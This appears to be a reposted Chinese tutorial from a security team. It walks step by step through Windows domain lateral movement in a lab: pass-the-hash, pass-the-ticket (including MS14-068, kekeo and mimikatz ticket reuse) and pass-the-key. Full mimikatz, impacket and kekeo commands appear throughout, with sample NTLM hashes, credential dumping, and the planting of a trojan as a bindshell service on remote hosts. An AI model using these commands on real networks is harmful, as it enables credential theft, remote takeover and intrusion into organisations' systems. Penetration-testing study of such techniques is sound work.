0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看威廉希尔官方网站 视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

什么是PTH?PTH利用手法介绍

jf_vLt34KHi 来源:Tide安全团队 2023-05-16 09:44 次阅读

PTH

什么是PTH?

pass the hash:哈希传递攻击,简称PTH,是在内网渗透中一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash或NTLM Hash访问远程主机或服务,而不用提供明文密码。在域环境中,用户登录计算机时使用的大部分都是域账号,大量计算机在安装时会使用相同的本地管理员账户密码。因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就可以使用哈希传递的方法登录到内网主机的其他计算机。因此,此类攻击适用于:

•域/工作组环境

•可以获得hash,但是条件不允许对hash进行爆破

•内网中存在和当前机器相同的密码

另外需要注意在Windows server 2012 R2 之前使用到的密码散列值是LM Hash、NTLM Hash,在2012 R2及其版本之后使用到的密码散列值是NTLM Hash。

PTH利用手法

当前演示环境如下:

92b64c2c-f329-11ed-90ce-dac502259ad0.png

如上图,该内网环境,域名为gog.org,共有3台机器,其中攻击者已经拿下了与该环境的Webserver,并读取到了该机器中的hash,接下来让我们尝试通过哈希传递的方式获取内网其他两台机器的控制权

mimikatz

其中我们的神器mimikatz就可以进行PTH攻击,但是mimikatz中的PTH攻击会在当前目标机器桌面中弹一个cmd窗口,所以不适合CS使用,适合获得当前目标桌面权限后再使用该命令去进行横向移动。首先我们先在Webserver中上传mimikatz,并读取hash:

privilege::debug#提升权限
sekurlsa::logonpasswords#抓取密码
92d5665c-f329-11ed-90ce-dac502259ad0.png

获得本地管理员用户的Hash后,用mimikatz将administrator的hash添加到lsass进程中

sekurlsa::pth/user:administrator/domain:192.168.3.32/ntlm:518b98ad4178a53695dc997aa02d455c
92f7ac58-f329-11ed-90ce-dac502259ad0.png

成功后会弹出一个新的cmd窗口,这时再去访问远程主机服务,就不需要提供明文密码了,直接连接即可

9331d572-f329-11ed-90ce-dac502259ad0.png

这时我们将192.168.3.32上线到CS中,就可使用将木马复制到该机器中,然后使用sc创建一个服务绑定木马,然后启动该服务上线即可,具体实现命令如下:

copy4444.exe\192.168.3.32c$#上传木马到目标机器中
sc\192.168.3.32createbindshellbinpath="c:4444.exe"#创建shell服务并绑定文件
93747ef4-f329-11ed-90ce-dac502259ad0.png9396748c-f329-11ed-90ce-dac502259ad0.png

可以看到目标机器中已经创建了bindshell服务,这里我们直接启用该服务即可

sc\192.168.3.32startbindshell#启动bindshell服务
93c01f1c-f329-11ed-90ce-dac502259ad0.png

启动之后3.32成功上线。但是,在使用mimikatz进行哈希传递攻击时需要注意以下几点:

1.使用mimikatz进行哈希传递要具有本地管理员权限

2.dir命令后面尽量跟主机名,否则可能会报错

impacket套件

除了mimikatz之外,像之前我们提到的impacket中的smbexec、wmiexec、psexec都可以进行PTH攻击。pythonpsexec.py-hashes:518b98ad4178a53695dc997aa02d455c./administrator@192.168.32"whoami"

93d1cf64-f329-11ed-90ce-dac502259ad0.png

pythonwmiexec.py-hashes:518b98ad4178a53695dc997aa02d455c./administrator@192.168.3.32"whoami"
93f090ac-f329-11ed-90ce-dac502259ad0.png
pythonsmbexec.py-hashes:518b98ad4178a53695dc997aa02d455c./administrator@192.168.3.32
940cdc8a-f329-11ed-90ce-dac502259ad0.png

PTT

pass the ticket:票据传递攻击,简称PTT,利用的票据凭证TGT进行的横向移动,它是利用Kerberos协议进行攻击的,这里介绍三种常见的攻击方法:MS14-068、Golden Ticket、SILVER ticket,简单来说就是将连接合法的票据注入到内存中实现连接。缺点:票据是有效期的,一般默认为10小时。

MS14-068

MS14-068是密钥分发中心(KDC)服务中的Windows漏洞,它允许经过身份验证的用户在其Kerberos票据(TGT)中插入任意PAC。该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中,用户可以通过呈现具有改变的PAC的Kerberos TGT来获得票证。MS14-068所造成的危害是允许域内任何一个普通用户都可以将自己提升为域管权限。微软给出的修复补丁是KB3011780,漏洞攻击是否成功要看目标机器打没打KB3011780补丁。

漏洞利用

可以看到当前我们所处的身份是域内的一个普通用户,是无法对域控进行文件操作的。

94256cbe-f329-11ed-90ce-dac502259ad0.png

这里我们第一步先获取当前机器的SID

shellwhoami/user
9441e164-f329-11ed-90ce-dac502259ad0.png

拿到SID后,使用我们的ms14-068.exe生成一个票据文件。-u指定当前用户,-s 输入我们刚刚获取到的SID,-p输入当前用户密码,具体命令如下

shellms14-068.exe-uwebadmin@god.org-sS-1-5-21-1218902331-2157346161-1782232778-1132-d192.168.3.21-padmin!@#45
945891de-f329-11ed-90ce-dac502259ad0.png

执行该命令后可以看到当前目录生成了一个票据文件。

947b0048-f329-11ed-90ce-dac502259ad0.png

这里生成票据文件后,就可以尝试连接目标看能否进行操作 首先清除下票据,以防该连接是以之前的票据进行连接的

shellklistpurge
9491ff32-f329-11ed-90ce-dac502259ad0.png

票据为空后,这里我们直接开始使用mimikatz导入票据,之后再来查看当前电脑的票据信息,看其是否有产生新的票据

mimikatzkerberos::ptcTGT_webadmin@god.org.ccache
shellklist
94affdf2-f329-11ed-90ce-dac502259ad0.png

票据为空后,这里我们直接尝试与目标主机进行连接创建服务进行上线(这里建议在连接时,使用主机名进行连接,IP地址容易产生失败的问题)

shellnetuse\OWA2010CN-GODc$
shellcopy4444.exe\OWA2010CN-GODc$
shellsc\OWA2010CN-GODcreatebinshel1binpath="c:4444.exe"
shellsc\OWA2010-GODstartbinshel1
94dadf90-f329-11ed-90ce-dac502259ad0.png94fe30f8-f329-11ed-90ce-dac502259ad0.png

成功执行上线到CS,相对来说,MS14-068这个漏洞利用条件较为简单,如果域控没有打KB3011780补丁,哪怕一个普通用户权限也可以去尝试该漏洞进行利用。

kekeo

利用获取到的NTLM生成新的票据去尝试,成功与否看NTLM是否正确 缺点:票据是有效期的,所以如果当前主机在链接过域控的话,有效期内可利用。kekeo和下面的mimikatz与刚刚我们上面的ms14-068原理不太一样,ms14-068是基于漏洞,去允许域内任何一个普通用户将自己提升为域管权限,而kekeo和mimikatz是基于hash生成票据,然后再进行连接。这里假设我们已经通过横向其他机器,拿到了域控的hash,然后通过kekeo来伪造票据进行连接。

95102772-f329-11ed-90ce-dac502259ad0.png

首先来看我们现在跳板机中的票据是空的

shellklist
952dd736-f329-11ed-90ce-dac502259ad0.png

然后上传我们的kekeo文件,首先先生成票据

shellkekeo"tgt::ask/user:Administrator/domain:god.org/ntlm:ccef208c6485269c20db2cad21734fe7""exit"
9545e7a4-f329-11ed-90ce-dac502259ad0.png

生成好后,可以看到当前目录会生成一个文件

955c3446-f329-11ed-90ce-dac502259ad0.png

该文件就是我们刚刚所生成的票据文件,接下来我们将它导入到内存中后,再来看我们的当前跳板机中有没有新增票据

shellkekeo"kerberos::pttTGT_Administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi""exit"
shellklist
95784f32-f329-11ed-90ce-dac502259ad0.png

可以看到成功导入了一个票据,那这里我们对域控进行尝试连接

shelldir\owa2010cn-godc$
95ad298c-f329-11ed-90ce-dac502259ad0.png

成功连接,那现在我相信大家可能都有一个疑问,就是现在都有了hash了,我直接使用pth去横向他不是更方便吗,为什么还要多此一举去生成票据之后,再用票据去进行横向呢?当然也是可以的,但是因为pth他所基于的协议,如smb、wmi、icp等,他们都依赖于135、445、139等端口等,那如果在环境中,出现端口、协议被禁用的情况的话,可以尝试使用得到的hash生成票据来进行横向。

MIMIKATZ

因为当前主机肯定之前与其他主机连接过,所以本地应该生成了一些票据,我们可以导出这些票据,然后在导入票据,利用,该方法类似于cookie欺骗。去利用历史遗留的票据重新认证尝试,成功与否看当前主机有没有被目标主机连接过。缺点:需要高权限用户 在进行本实验之前,需要先interwetten与威廉的赔率体系 一下域管用户在本机上的连接操作,留下票据之后在进行横向操作(可以在域控中远程链接一下跳板机或向C盘写入一个文件并认证)。

95cb5542-f329-11ed-90ce-dac502259ad0.png

如上图,我们假设这条票据是之前域管用户在跳板机中留下的历史票据,那这里我们可以使用mimikatz进行伪造票据。首先我们先将内存中的票据导出

mimikatzsekurlsa::tickets/export

导出后可以看到当前目录会出现一个票据文件

95ee5a06-f329-11ed-90ce-dac502259ad0.png

这里再将其导入到内存中

mimikatzkerberos::pttC:UserswebadminDesktopTGT_Administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
96070f06-f329-11ed-90ce-dac502259ad0.png

导入成功后,这里我们直接进行对靶标进行连接

shellnetuse\owa2010cn-godc$
shelldir\OWA2010CN-GODc$
961b50a6-f329-11ed-90ce-dac502259ad0.png

PTK

pass the key:密钥传递攻击,简称PTK,利用的ekeys aes256进行的横向移动,成功几率不是很高,利用条件苛刻 漏洞利用条件:当系统安装了KB2871997补丁且禁用了NTLM的时候,那我们抓取到的NTLM hash就失去了作用,但是可以通过PTK的攻击方式获得权限。首先使用mimikatz导出aes值

mimikatzsekurlsa::ekeys
963b56f8-f329-11ed-90ce-dac502259ad0.png

导出后使用我们下面这条命令来进行利用

mimikatzsekurlsa::pth/user:域用户名/domain:域名/aes256:aes256值
mimikatzsekurlsa::pth/user:administrator/domain:god/aes256:1811e5811877a782b6c11e2b0165ffb88d40a633f922a012372095a43d72d7ae

执行后会在桌面弹出一个cmd窗口,这里就可以进行横向移动利用,但是上文也讲了,该移动方法的利用条件有点苛刻,他是目标系统必须打了KB2871997且禁用了NTLM hash传递时,才可以利用,但是由于我们的靶场环境并没有打KB2871997补丁且没有禁用NTLM Hash,故无法利用成功。且当一个思路吧。





审核编辑:刘清

声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • PTH
    PTH
    +关注

    关注

    0

    文章

    40

    浏览量

    17734
  • Hash算法
    +关注

    关注

    0

    文章

    43

    浏览量

    7382

原文标题:横向移动之PTH、PPT、PTK

文章出处:【微信号:Tide安全团队,微信公众号:Tide安全团队】欢迎添加关注!文章转载请注明出处。

收藏 人收藏

    评论

    相关推荐

    PTH08T220W出现脱焊的情况怎么解决?

    PTH08T220W 焊接问题求助。PTH08T220W为非对称的引脚排列,客户的SMT后pin 1脚出现脱焊的情况,需要在pin 1引脚加胶水固定。请帮忙给出对策。谢谢!
    发表于 12-16 07:44

    PTH和NPTH的简单区别

      PTH是沉铜孔(Plating Through Hole),孔壁有铜,一般是过电孔(VIA)及元件孔。  NPTH是非沉铜孔(Non Plating Through Hole),孔壁无铜,一般是定位孔及锣丝孔。可用干膜封孔或在电镀前胶粒塞或电镀后二次钻孔或啤出。
    发表于 08-29 09:55

    PTH12020 pdf datasheet

    The PTH12020 series of non-isolatedpower modules offers OEM designers acombination of high
    发表于 08-06 16:58 32次下载

    PTH12060 pdf datasheet

    The PTH12060 series is a non-isolated power module, and part of a new class of complete dc/dc
    发表于 08-06 16:59 14次下载

    PTH05060W pdf datasheet

    The PTH05060W non-isolated powermodule is small in size but big on performanceand flexibility. Its
    发表于 08-06 17:03 17次下载

    PTH04T240W,PTH04T241W,pdf(10-A

    The PTH04T240/241W is a high-performance 10-A rated, non-isolated power module. These modules
    发表于 11-16 15:12 9次下载

    PTH04T230W,PTH04T231W,pdf(6-A,

    The PTH04T230/231W is a high-performance, 6-A rated, non-isolated power module. This regulator
    发表于 11-16 15:17 9次下载

    PTH08T230W,PTH08T231W,pdf(6-A

    The PTH08T230/231W is the higher input voltage (4.5V to 14V) version of the PTH04T230/231W (2.2V
    发表于 11-16 15:24 10次下载

    PTH08T240W,PTH08T241W,pdf(10A

    The PTH08T240/241W is a high-performance 10-A rated, non-isolated power module. These modules
    发表于 11-16 15:26 17次下载

    PTH04T221W,pdf(16-A, 2.2-V to

    The PTH04T220/221W is the lower input voltage (2.2V to 5.5V) version of the PTH08T220/221W (4.5V
    发表于 11-16 16:12 5次下载

    PTH08000W,pdf(2.25 A 4.5-V TO

    The PTH08000W is a highly integrated, low-cost switching regulator module that delivers up to 2.25
    发表于 11-18 12:14 9次下载

    PTH12030W,PTH12030L,pdf(26 A,

    The PTH12030 is a series of high current, non-isolated power module from Texas Instruments.
    发表于 11-18 13:45 6次下载

    PTH12060W,PTH12060L,pdf(10 A,

    The PTH12060 series is a non-isolatedpower module, and part of a new class of complete dc/dc
    发表于 11-18 13:51 11次下载

    PTH与NPTH的区别及用途

    PCB板设计中,孔有四个作用:电气导通、定位、散热、方便分板。而孔又分导通孔(PTH)和非导通孔(NPTH),而在一般的设计中,只有PTH孔有孔环(见下图),NPTH孔是不具备有孔环的,但是一些特殊情况也会将NPTH孔设计孔环(这时候的孔环起到接地作用)。
    的头像 发表于 05-23 14:53 7w次阅读

    了解pcb制造中的PTH工艺

    化学镀铜,我们也称为镀通孔(PTH),它是一种自催化氧化还原反应。 PTH工艺在钻完两层或更多层后进行。
    的头像 发表于 07-29 09:49 2.9w次阅读
    了解pcb制造中的<b class='flag-5'>PTH</b>工艺